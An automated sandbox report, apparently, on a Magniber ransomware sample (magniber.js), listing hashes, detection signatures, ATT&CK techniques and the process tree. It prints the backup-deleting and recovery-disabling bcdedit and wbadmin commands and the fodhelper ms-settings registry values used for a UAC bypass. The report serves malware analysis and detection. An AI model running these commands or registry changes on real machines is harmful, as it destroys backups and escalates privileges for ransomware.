magniber | 71ceb2ad434eb37db1b45f4f2bb9e9cf42ce6f328759ee4f21a40c5b1557c345

General

Target

magniber.js
Size

172KB
MD5

66422ca83d86f5f9e18aa3da2765606c
SHA1

ef9b4fd687b41d504120f8970a157007ce2aef33
SHA256

6155453a58b0ba360fd18a32d838c4452fec374c364824b50447500c8fd12e80
SHA512

fd7f6b9678e8d7908a67d0166645c7dcfb50737954b3abdff84cde85fe7de5b9e4652affaba3ee742255d2c18f272a43906d3c218dc107fdf57f014805f6386f
SSDEEP

768:lf2dpCbpst8Z7BE4/wKw2pZSbIgMcLtKOXvSIhjIilDuBoWZq2g85UIIofMzVc2t:+45BcLs1ICiZ25PfIW5Yrh

Score

10^/10

magniber evasion ransomware

Malware Config

Signatures

Detect magniber ransomware 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4384-133-0x0000016A41A6B000-0x0000016A41A76000-memory.dmp	family_magniber
behavioral2/memory/2360-134-0x000001DB942A0000-0x000001DB942AB000-memory.dmp	family_magniber
behavioral2/memory/4384-147-0x0000016A41A6B000-0x0000016A41A76000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

bcdedit.exebcdedit.exewbadmin.exewbadmin.exebcdedit.exebcdedit.exewbadmin.exewbadmin.exebcdedit.exewbadmin.exebcdedit.exewbadmin.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1396	904	bcdedit.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	384	904	bcdedit.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4120	904	wbadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3708	904	wbadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4320	904	bcdedit.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5048	904	bcdedit.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4296	904	wbadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3004	904	wbadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4844	904	bcdedit.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	456	904	wbadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5116	904	bcdedit.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4824	904	wbadmin.exe

Modifies boot configuration data using bcdedit 1 TTPs 6 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid process

1396 bcdedit.exe
384 bcdedit.exe
4320 bcdedit.exe
5048 bcdedit.exe
4844 bcdedit.exe
5116 bcdedit.exe
Deletes System State backups 3 TTPs 3 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exewbadmin.exewbadmin.exe

pid process

3708 wbadmin.exe
3004 wbadmin.exe
4824 wbadmin.exe
Deletes backup catalog 3 TTPs 3 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exewbadmin.exewbadmin.exe

pid process

4120 wbadmin.exe
4296 wbadmin.exe
456 wbadmin.exe

pid	process
1396	bcdedit.exe
384	bcdedit.exe
4320	bcdedit.exe
5048	bcdedit.exe
4844	bcdedit.exe
5116	bcdedit.exe

pid	process
3708	wbadmin.exe
3004	wbadmin.exe
4824	wbadmin.exe

pid	process
4120	wbadmin.exe
4296	wbadmin.exe
456	wbadmin.exe

Modifies extensions of user files 10 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

sihost.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\WriteGrant.raw => C:\Users\Admin\Pictures\WriteGrant.raw.kuwjqqa	sihost.exe
File renamed	C:\Users\Admin\Pictures\ExportUnpublish.tif => C:\Users\Admin\Pictures\ExportUnpublish.tif.kuwjqqa	sihost.exe
File opened for modification	C:\Users\Admin\Pictures\InitializeExit.tiff	sihost.exe
File renamed	C:\Users\Admin\Pictures\InitializeExit.tiff => C:\Users\Admin\Pictures\InitializeExit.tiff.kuwjqqa	sihost.exe
File renamed	C:\Users\Admin\Pictures\OpenRead.tif => C:\Users\Admin\Pictures\OpenRead.tif.kuwjqqa	sihost.exe
File renamed	C:\Users\Admin\Pictures\OptimizeOut.raw => C:\Users\Admin\Pictures\OptimizeOut.raw.kuwjqqa	sihost.exe
File renamed	C:\Users\Admin\Pictures\ResizeConfirm.crw => C:\Users\Admin\Pictures\ResizeConfirm.crw.kuwjqqa	sihost.exe
File renamed	C:\Users\Admin\Pictures\ExportStart.png => C:\Users\Admin\Pictures\ExportStart.png.kuwjqqa	sihost.exe
File opened for modification	C:\Users\Admin\Pictures\ExportRestart.tiff	sihost.exe
File renamed	C:\Users\Admin\Pictures\ExportRestart.tiff => C:\Users\Admin\Pictures\ExportRestart.tiff.kuwjqqa	sihost.exe

Drops file in Windows directory 3 IoCs

Processes:

wbadmin.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3300 3284 WerFault.exe DllHost.exe

pid	pid_target	process	target process
3300	3284	WerFault.exe	DllHost.exe

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vds.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe

Modifies registry class 40 IoCs

Processes:

svchost.exesvchost.exesihost.exeExplorer.EXERuntimeBroker.exeRuntimeBroker.exeRuntimeBroker.exetaskhostw.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/vozneedm.cit"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/jcmeprevd.cit"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/eoxhtag.cit"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/owkzobnclr.cit"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/dsdmwgqas.cit"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/hrdlxntbjowz.cit"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/pfkaciloqt.cit"	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/vocryyslb.cit"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\CurVer	RuntimeBroker.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

wscript.exe

pid process

4384 wscript.exe
4384 wscript.exe

pid	process
4384	wscript.exe
4384	wscript.exe

Suspicious use of AdjustPrivilegeToken 54 IoCs

Processes:

Explorer.EXERuntimeBroker.exevssvc.exewbengine.exe

description	pid	process
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	3452	RuntimeBroker.exe
Token: SeShutdownPrivilege	3452	RuntimeBroker.exe
Token: SeBackupPrivilege	2976	vssvc.exe
Token: SeRestorePrivilege	2976	vssvc.exe
Token: SeAuditPrivilege	2976	vssvc.exe
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeBackupPrivilege	4312	wbengine.exe
Token: SeRestorePrivilege	4312	wbengine.exe
Token: SeSecurityPrivilege	4312	wbengine.exe
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE
Token: SeShutdownPrivilege	724	Explorer.EXE
Token: SeCreatePagefilePrivilege	724	Explorer.EXE

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

wscript.execmd.exefodhelper.execmd.exefodhelper.execmd.exefodhelper.execmd.exefodhelper.exe

description	pid	process	target process
PID 4384 wrote to memory of 2360	4384	wscript.exe	sihost.exe
PID 4384 wrote to memory of 2372	4384	wscript.exe	svchost.exe
PID 4384 wrote to memory of 2460	4384	wscript.exe	taskhostw.exe
PID 4384 wrote to memory of 724	4384	wscript.exe	Explorer.EXE
PID 4384 wrote to memory of 3088	4384	wscript.exe	svchost.exe
PID 4384 wrote to memory of 3284	4384	wscript.exe	DllHost.exe
PID 4384 wrote to memory of 3380	4384	wscript.exe	StartMenuExperienceHost.exe
PID 4384 wrote to memory of 3452	4384	wscript.exe	RuntimeBroker.exe
PID 4384 wrote to memory of 3540	4384	wscript.exe	SearchApp.exe
PID 4384 wrote to memory of 3836	4384	wscript.exe	RuntimeBroker.exe
PID 4384 wrote to memory of 4808	4384	wscript.exe	RuntimeBroker.exe
PID 4384 wrote to memory of 3976	4384	wscript.exe	RuntimeBroker.exe
PID 2588 wrote to memory of 2020	2588	cmd.exe	fodhelper.exe
PID 2588 wrote to memory of 2020	2588	cmd.exe	fodhelper.exe
PID 2020 wrote to memory of 3912	2020	fodhelper.exe	wscript.exe
PID 2020 wrote to memory of 3912	2020	fodhelper.exe	wscript.exe
PID 2148 wrote to memory of 1552	2148	cmd.exe	fodhelper.exe
PID 2148 wrote to memory of 1552	2148	cmd.exe	fodhelper.exe
PID 1552 wrote to memory of 1064	1552	fodhelper.exe	wscript.exe
PID 1552 wrote to memory of 1064	1552	fodhelper.exe	wscript.exe
PID 5100 wrote to memory of 1336	5100	cmd.exe	fodhelper.exe
PID 5100 wrote to memory of 1336	5100	cmd.exe	fodhelper.exe
PID 1336 wrote to memory of 4820	1336	fodhelper.exe	wscript.exe
PID 1336 wrote to memory of 4820	1336	fodhelper.exe	wscript.exe
PID 2220 wrote to memory of 4456	2220	cmd.exe	fodhelper.exe
PID 2220 wrote to memory of 4456	2220	cmd.exe	fodhelper.exe
PID 4456 wrote to memory of 5060	4456	fodhelper.exe	wscript.exe
PID 4456 wrote to memory of 5060	4456	fodhelper.exe	wscript.exe

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
- Modifies registry class
PID:3088

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3452

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3976

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:4808

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:3836
- C:\Windows\System32\cmd.exe
  /c fodhelper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2220
- - C:\Windows\System32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4456
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" /B /E:VBScript.Encode ../../Users/Public/owkzobnclr.cit
      4⤵
      PID:5060

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3540

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3380

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3284
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3284 -s 928
  2⤵
  - Program crash
  PID:3300

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:724
- C:\Windows\system32\wscript.exe
  wscript.exe C:\Users\Admin\AppData\Local\Temp\magniber.js
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4384
- C:\Windows\System32\cmd.exe
  /c fodhelper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5100
- - C:\Windows\System32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1336
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" /B /E:VBScript.Encode ../../Users/Public/owkzobnclr.cit
      4⤵
      PID:4820

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
PID:2460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Modifies registry class
PID:2372
- C:\Windows\System32\cmd.exe
  /c fodhelper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2588
- - C:\Windows\System32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2020
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" /B /E:VBScript.Encode ../../Users/Public/jcmeprevd.cit
      4⤵
      PID:3912

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies extensions of user files
- Modifies registry class
PID:2360
- C:\Windows\System32\cmd.exe
  /c fodhelper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2148
- - C:\Windows\System32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1552
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" /B /E:VBScript.Encode ../../Users/Public/jcmeprevd.cit
      4⤵
      PID:1064

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 456 -p 3284 -ip 3284
1⤵
PID:2568

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2976

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:1396

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:384

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:4120

C:\Windows\system32\wbadmin.exe
wbadmin delete systemstatebackup -quiet
1⤵
- Process spawned unexpected child process
- Deletes System State backups
- Drops file in Windows directory
PID:3708

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4312

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:4320

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:5048

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:4296

C:\Windows\system32\wbadmin.exe
wbadmin delete systemstatebackup -quiet
1⤵
- Process spawned unexpected child process
- Deletes System State backups
PID:3004

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:1220

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:3208

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:4844

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:456

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:5116

C:\Windows\system32\wbadmin.exe
wbadmin delete systemstatebackup -quiet
1⤵
- Process spawned unexpected child process
- Deletes System State backups
PID:4824

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

2

T1059

Persistence

Privilege Escalation

Defense Evasion

File Deletion

2

T1107

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

3

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\jcmeprevd.cit

Filesize
887B

MD5
08f4af03b9d315186edc56e83ce0e064

SHA1
019422a579f9f51d299804a40e2a455d66d231ee

SHA256
9eb91e8dda3b936f34cfe8dab1e879ae019fee04b7ae5c676fb10523ca708260

SHA512
f12b5a3fbbff83fdb8a1e2689f60fe9801ebeee2ab44920c525983342883c0a493c0359863c32227d1df4a15af8356f063f567c5b9e2b2bdc77750b82ebf7181

Download Submit
C:\Users\Public\owkzobnclr.cit

Filesize
887B

MD5
08f4af03b9d315186edc56e83ce0e064

SHA1
019422a579f9f51d299804a40e2a455d66d231ee

SHA256
9eb91e8dda3b936f34cfe8dab1e879ae019fee04b7ae5c676fb10523ca708260

SHA512
f12b5a3fbbff83fdb8a1e2689f60fe9801ebeee2ab44920c525983342883c0a493c0359863c32227d1df4a15af8356f063f567c5b9e2b2bdc77750b82ebf7181

Download Submit
memory/1064-153-0x0000000000000000-mapping.dmp

Download
memory/1336-154-0x0000000000000000-mapping.dmp

Download
memory/1552-152-0x0000000000000000-mapping.dmp

Download
memory/2020-149-0x0000000000000000-mapping.dmp

Download
memory/2360-134-0x000001DB942A0000-0x000001DB942AB000-memory.dmp

Filesize
44KB

Download
memory/3912-150-0x0000000000000000-mapping.dmp

Download
memory/4384-147-0x0000016A41A6B000-0x0000016A41A76000-memory.dmp

Filesize
44KB

Download
memory/4384-148-0x00007FFB54730000-0x00007FFB551F1000-memory.dmp

Filesize
10.8MB

Download
memory/4384-132-0x00007FFB54730000-0x00007FFB551F1000-memory.dmp

Filesize
10.8MB

Download
memory/4384-143-0x00007FFB54730000-0x00007FFB551F1000-memory.dmp

Filesize
10.8MB

Download
memory/4384-133-0x0000016A41A6B000-0x0000016A41A76000-memory.dmp

Filesize
44KB

Download
memory/4456-156-0x0000000000000000-mapping.dmp

Download
memory/4820-155-0x0000000000000000-mapping.dmp

Download
memory/5060-157-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads